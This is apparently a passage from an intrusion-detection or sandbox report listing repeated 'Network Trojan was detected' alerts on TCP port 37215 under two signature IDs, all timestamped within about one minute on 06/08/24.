          SID:2829579
          Source Port:33058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510428
          SID:2829579
          Source Port:34414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152347
          SID:2835222
          Source Port:36422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.062877
          SID:2835222
          Source Port:52568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600306
          SID:2829579
          Source Port:35980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112144
          SID:2829579
          Source Port:35842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509747
          SID:2829579
          Source Port:54016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743449
          SID:2829579
          Source Port:39904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264393
          SID:2835222
          Source Port:39730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.749081
          SID:2829579
          Source Port:33402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739345
          SID:2835222
          Source Port:46738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.844161
          SID:2835222
          Source Port:54446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705385
          SID:2835222
          Source Port:36138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817540
          SID:2829579
          Source Port:45926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040428
          SID:2835222
          Source Port:39804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861906
          SID:2835222
          Source Port:60878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743648
          SID:2829579
          Source Port:36808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745834
          SID:2829579
          Source Port:55734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179354
          SID:2829579
          Source Port:47172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160929
          SID:2829579
          Source Port:58084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.088048
          SID:2829579
          Source Port:35754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.813262
          SID:2835222
          Source Port:38856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747237
          SID:2829579
          Source Port:37906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783883
          SID:2829579
          Source Port:59256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113171
          SID:2829579
          Source Port:41900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732494
          SID:2829579
          Source Port:33408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741566
          SID:2835222
          Source Port:53538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151374
          SID:2829579
          Source Port:50822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745510
          SID:2829579
          Source Port:53324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706646
          SID:2829579
          Source Port:52118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130709
          SID:2835222
          Source Port:56352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516742
          SID:2829579
          Source Port:36090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672315
          SID:2829579
          Source Port:41354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108695
          SID:2829579
          Source Port:45372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861796
          SID:2835222
          Source Port:38546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513753
          SID:2829579
          Source Port:36326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353851
          SID:2829579
          Source Port:33660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354321
          SID:2829579
          Source Port:59428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.739035
          SID:2829579
          Source Port:58476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.748978
          SID:2829579
          Source Port:37762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732454
          SID:2829579
          Source Port:50070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861481
          SID:2829579
          Source Port:51662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746049
          SID:2835222
          Source Port:59474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.735122
          SID:2835222
          Source Port:34848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.736583
          SID:2829579
          Source Port:33052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.116497
          SID:2835222
          Source Port:41814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747290
          SID:2835222
          Source Port:33766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262511
          SID:2829579
          Source Port:35158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.859967
          SID:2829579
          Source Port:50612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734843
          SID:2835222
          Source Port:48904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789919
          SID:2835222
          Source Port:56990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395955
          SID:2829579
          Source Port:53620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797865
          SID:2835222
          Source Port:55584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.302366
          SID:2835222
          Source Port:39486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739628
          SID:2829579
          Source Port:49906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448706
          SID:2829579
          Source Port:46132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495855
          SID:2835222
          Source Port:57054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466264
          SID:2829579
          Source Port:38298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.025871
          SID:2835222
          Source Port:50410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.819239
          SID:2835222
          Source Port:45952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353089
          SID:2835222
          Source Port:60016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099503
          SID:2835222
          Source Port:38336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.058216
          SID:2829579
          Source Port:41550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351231
          SID:2829579
          Source Port:42912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896791
          SID:2829579
          Source Port:50792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780297
          SID:2829579
          Source Port:34972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729698
          SID:2835222
          Source Port:54298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895685
          SID:2835222
          Source Port:42680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127910
          SID:2835222
          Source Port:49350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136260
          SID:2835222
          Source Port:42540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513382
          SID:2835222
          Source Port:44782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177038
          SID:2829579
          Source Port:52618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911558
          SID:2829579
          Source Port:32974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.837521
          SID:2829579
          Source Port:52896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743067
          SID:2829579
          Source Port:59904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743086
          SID:2835222
          Source Port:50460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.078821
          SID:2829579
          Source Port:60218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857848
          SID:2835222
          Source Port:44418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.820970
          SID:2829579
          Source Port:57332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911893
          SID:2829579
          Source Port:50652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855133
          SID:2829579
          Source Port:47766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911521
          SID:2829579
          Source Port:34926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270502
          SID:2835222
          Source Port:50460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673795
          SID:2835222
          Source Port:52094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708338
          SID:2829579
          Source Port:36898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405817
          SID:2835222
          Source Port:58094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355744
          SID:2835222
          Source Port:60134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600396
          SID:2829579
          Source Port:60676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895850
          SID:2835222
          Source Port:55786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.394504
          SID:2835222
          Source Port:43378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160682
          SID:2829579
          Source Port:57456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.079786
          SID:2835222
          Source Port:46330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730922
          SID:2829579
          Source Port:44982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787357
          SID:2835222
          Source Port:50738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542675
          SID:2835222
          Source Port:45102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261372
          SID:2829579
          Source Port:38446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742986
          SID:2829579
          Source Port:33544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672682
          SID:2829579
          Source Port:53660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745660
          SID:2835222
          Source Port:40590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075037
          SID:2829579
          Source Port:45410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729447
          SID:2829579
          Source Port:33954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109160
          SID:2835222
          Source Port:52318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.796285
          SID:2829579
          Source Port:60226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782617
          SID:2835222
          Source Port:44042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551640
          SID:2835222
          Source Port:35598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.258610
          SID:2835222
          Source Port:35750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.109251
          SID:2835222
          Source Port:50304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356591
          SID:2829579
          Source Port:40626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273135
          SID:2835222
          Source Port:39554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240761
          SID:2829579
          Source Port:37960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113242
          SID:2835222
          Source Port:37374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741542
          SID:2835222
          Source Port:37956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808015
          SID:2829579
          Source Port:48768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.445953
          SID:2835222
          Source Port:52948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517728
          SID:2829579
          Source Port:40436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158369
          SID:2829579
          Source Port:53576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176496
          SID:2829579
          Source Port:59736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.843997
          SID:2829579
          Source Port:38414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547295
          SID:2829579
          Source Port:44672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729774
          SID:2835222
          Source Port:42034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410640
          SID:2829579
          Source Port:42694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191941
          SID:2835222
          Source Port:45920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.056639
          SID:2829579
          Source Port:39558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884075
          SID:2829579
          Source Port:42540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.265903
          SID:2835222
          Source Port:49690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.156056
          SID:2829579
          Source Port:52856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260846
          SID:2835222
          Source Port:46270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355385
          SID:2835222
          Source Port:60478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602086
          SID:2829579
          Source Port:48768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.829519
          SID:2829579
          Source Port:42954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.915166
          SID:2829579
          Source Port:54868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410036
          SID:2829579
          Source Port:60358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.813601
          SID:2829579
          Source Port:47082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747933
          SID:2829579
          Source Port:41674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600631
          SID:2835222
          Source Port:37378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259806
          SID:2835222
          Source Port:46692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130680
          SID:2835222
          Source Port:54476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402395
          SID:2835222
          Source Port:42454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272903
          SID:2835222
          Source Port:48122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731143
          SID:2829579
          Source Port:53060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260567
          SID:2829579
          Source Port:51746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468802
          SID:2835222
          Source Port:44756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667620
          SID:2835222
          Source Port:57978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129357
          SID:2829579
          Source Port:39778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.883920
          SID:2835222
          Source Port:39588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395922
          SID:2835222
          Source Port:48396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671855
          SID:2829579
          Source Port:33222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.807571
          SID:2835222
          Source Port:40978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604622
          SID:2835222
          Source Port:33886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191858
          SID:2829579
          Source Port:58616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.306389
          SID:2835222
          Source Port:55198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671664
          SID:2835222
          Source Port:41578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038926
          SID:2835222
          Source Port:34880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355832
          SID:2829579
          Source Port:36824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275629
          SID:2829579
          Source Port:49500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798341
          SID:2835222
          Source Port:46090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173749
          SID:2835222
          Source Port:46836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780452
          SID:2835222
          Source Port:53606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042855
          SID:2829579
          Source Port:44114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673184
          SID:2835222
          Source Port:51618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405087
          SID:2829579
          Source Port:50120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354466
          SID:2829579
          Source Port:53680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746107
          SID:2829579
          Source Port:47324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462321
          SID:2829579
          Source Port:36106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516580
          SID:2835222
          Source Port:57410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.669967
          SID:2835222
          Source Port:55592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.807081
          SID:2835222
          Source Port:52852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.883925
          SID:2835222
          Source Port:37992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745440
          SID:2829579
          Source Port:58914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742600
          SID:2835222
          Source Port:60232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742116
          SID:2829579
          Source Port:56210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731832
          SID:2835222
          Source Port:33260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462422
          SID:2835222
          Source Port:42214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817273
          SID:2829579
          Source Port:46274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.364842
          SID:2829579
          Source Port:47410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238421
          SID:2829579
          Source Port:58044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405817
          SID:2829579
          Source Port:47178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708400
          SID:2835222
          Source Port:53644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599687
          SID:2829579
          Source Port:54180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747201
          SID:2829579
          Source Port:51806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548797
          SID:2829579
          Source Port:51638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.509878
          SID:2829579
          Source Port:60056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.394652
          SID:2829579
          Source Port:38076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.015838
          SID:2835222
          Source Port:40396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.456238
          SID:2835222
          Source Port:33046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513845
          SID:2835222
          Source Port:34442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272206
          SID:2835222
          Source Port:37668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.812629
          SID:2829579
          Source Port:58800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.169398
          SID:2835222
          Source Port:51598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554890
          SID:2835222
          Source Port:46922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670126
          SID:2829579
          Source Port:33298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745336
          SID:2835222
          Source Port:40950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262279
          SID:2835222
          Source Port:38360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353215
          SID:2835222
          Source Port:57430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.860709
          SID:2829579
          Source Port:47736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059890
          SID:2829579
          Source Port:36504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861350
          SID:2829579
          Source Port:51044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797339
          SID:2835222
          Source Port:55298
          Destination Port:37215
